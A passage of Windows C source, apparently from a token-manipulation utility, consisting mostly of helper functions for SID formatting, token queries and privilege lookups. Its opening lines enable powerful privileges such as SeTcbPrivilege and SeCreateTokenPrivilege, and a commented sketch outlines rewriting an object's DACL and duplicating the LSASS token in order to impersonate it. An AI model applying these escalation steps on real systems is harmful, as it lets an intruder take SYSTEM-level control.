printf("ImpersonateLoggedOnUser Error:%d\n",GetLastError());
CloseHandle(NewToken);
return -1;
}
// Return values are not checked; GrantPriv prints its own diagnostics.
GrantPriv("SeCreateTokenPrivilege");
GrantPriv("SeTcbPrivilege");
GrantPriv("SeIncreaseQuotaPrivilege");
GrantPriv("SeAssignPrimaryTokenPrivilege");
// NewToken is deliberately kept open: closing it here would end the impersonation the caller relies on.
//CloseHandle(NewToken);
return 0;
// Sketch of the DACL-edit sequence presumably implemented by AddUserPrivToHandle (not verified here):
// GetKernelObjectSecurity(Handle,DACL_SECURITY_INFORMATION,buf,size,&len)
// GetSecurityDescriptorDacl(buf,&lpbDaclPresent,PoldACL,&lpbDaclDefaulted);
// BuildExplicitAccessWithName(pstruct,"administrators",TOKEN_ALL_ACCESS,GRANT_ACCESS,NO_INHERITANCE)
// SetEntriesInAcl(1,pstruct,PoldACL,PnewACL); // merge permissions
// MakeAbsoluteSD(buf,buf2,
// SetSecurityDescriptorDacl(buf2,lpbDaclPresent,PnewACL,lpbDaclDefaulted);
// SetKernelObjectSecurity(HANDLE,DACL_SECURITY_INFORMATION,buf2,);
// CloseHandle(HANDLE);
// DuplicateTokenEx(LsassToken,TOKEN_ALL_ACCESS,NULL,SecurityImpersonation,TokenPrimary,&NewToken);
// CloseHandle(LsassToken);
// ImpersonateLoggedOnUser
}
//help text
/* usage - print the command-line synopsis; s is the program name (argv[0]). */
void usage(char *s)
{
    fprintf(stdout, "Usage:%s <-u user>\n", s);
}
/*
 * ConvertSidToStringSid - render a binary SID as text ("S-1-5-21-...").
 *
 * pSid          : binary SID to format; rejected with FALSE if IsValidSid fails.
 * TextualSid    : caller-supplied output buffer.
 * lpdwBufferLen : in/out, buffer size in bytes. When too small, receives the
 *                 required size, last error is set to ERROR_INSUFFICIENT_BUFFER
 *                 and FALSE is returned with the buffer untouched.
 *
 * The identifier authority is printed in decimal when its two high bytes are
 * zero, otherwise as a 0x-prefixed 6-byte hex value; sub-authorities follow
 * as "-<decimal>". Returns TRUE once the string has been written.
 */
BOOL ConvertSidToStringSid(PSID pSid,LPTSTR TextualSid, LPDWORD lpdwBufferLen)
{
    PSID_IDENTIFIER_AUTHORITY authority;
    DWORD revision = SID_REVISION;
    DWORD subCount;
    DWORD needed;
    DWORD written;
    DWORD idx;

    if (!IsValidSid(pSid)) {
        return FALSE;
    }

    authority = GetSidIdentifierAuthority(pSid);
    subCount = *GetSidSubAuthorityCount(pSid);

    /* "S-" + revision + "-" + authority + "-" per sub-authority + NUL, in TCHARs. */
    needed = (15 + 12 + (12 * subCount) + 1) * sizeof(TCHAR);
    if (*lpdwBufferLen < needed) {
        *lpdwBufferLen = needed;
        SetLastError(ERROR_INSUFFICIENT_BUFFER);
        return FALSE;
    }

    /* Track the write position by the character counts wsprintf returns. */
    written = wsprintf(TextualSid, TEXT("S-%lu-"), revision);

    if (authority->Value[0] == 0 && authority->Value[1] == 0) {
        ULONG packed = (ULONG)authority->Value[5]
                     | ((ULONG)authority->Value[4] << 8)
                     | ((ULONG)authority->Value[3] << 16)
                     | ((ULONG)authority->Value[2] << 24);
        written += wsprintf(TextualSid + written, TEXT("%lu"), packed);
    } else {
        written += wsprintf(TextualSid + written,
                            TEXT("0x%02hx%02hx%02hx%02hx%02hx%02hx"),
                            (USHORT)authority->Value[0],
                            (USHORT)authority->Value[1],
                            (USHORT)authority->Value[2],
                            (USHORT)authority->Value[3],
                            (USHORT)authority->Value[4],
                            (USHORT)authority->Value[5]);
    }

    for (idx = 0; idx < subCount; idx++) {
        written += wsprintf(TextualSid + written, TEXT("-%lu"),
                            *GetSidSubAuthority(pSid, idx));
    }

    return TRUE;
}
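/*
 * GetFromToken - query one TOKEN_INFORMATION_CLASS from hToken into a freshly
 * malloc'd buffer.
 *
 * hToken : token handle opened with at least TOKEN_QUERY by the caller.
 * tic    : information class to fetch (e.g. TokenDefaultDacl).
 *
 * Returns the buffer, which the caller releases with free()/pfree(), or NULL
 * on failure after printing a diagnostic; nothing is leaked on failure (the
 * previous version lost the buffer when the second query failed).
 *
 * The first GetTokenInformation call, with a NULL buffer, only sizes the
 * result; any outcome other than ERROR_INSUFFICIENT_BUFFER, or a reported
 * size of zero, is treated as an error.
 */
void *GetFromToken(HANDLE hToken, TOKEN_INFORMATION_CLASS tic)
{
    DWORD needed = 0;
    void *p;

    if (!GetTokenInformation(hToken, tic, NULL, 0, &needed)
        && GetLastError() != ERROR_INSUFFICIENT_BUFFER) {
        printf("GetTokenInformation Failed:%d\n", (int)GetLastError());
        return NULL;
    }
    if (needed == 0) {
        /* A zero-sized answer cannot be used; report it instead of allocating 1 byte. */
        printf("GetTokenInformation reported an empty result\n");
        return NULL;
    }

    p = malloc(needed);
    if (p == NULL) {
        printf("Malloc in GetFromToken Failed\n");
        return NULL;
    }

    if (!GetTokenInformation(hToken, tic, p, needed, &needed)) {
        printf("GetTokenInformation After Malloc Failed:%d\n", (int)GetLastError());
        free(p);
        return NULL;
    }
    return p;
}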
/* pfree - release a heap block; p may be NULL, for which free() is already a no-op. */
void pfree(void *p)
{
    free(p);
}
/*
 * GetLuidFromText - look up the LUID of a privilege by name
 * (e.g. "SeChangeNotifyPrivilege").
 *
 * s : privilege name passed to LookupPrivilegeValue on the local system.
 *
 * The LUID is initialised to {0,0} and returned as-is whether or not the
 * lookup succeeds; on failure a diagnostic is printed, which is the only
 * failure signal callers get.
 */
LUID GetLuidFromText(char *s)
{
    LUID result = {0, 0};

    if (LookupPrivilegeValue(NULL, s, &result) == FALSE) {
        printf("LookupPrivilegeValue under GetLuidFromText(\"%s\") Failed:%d\n",s,GetLastError());
    }
    return result;
}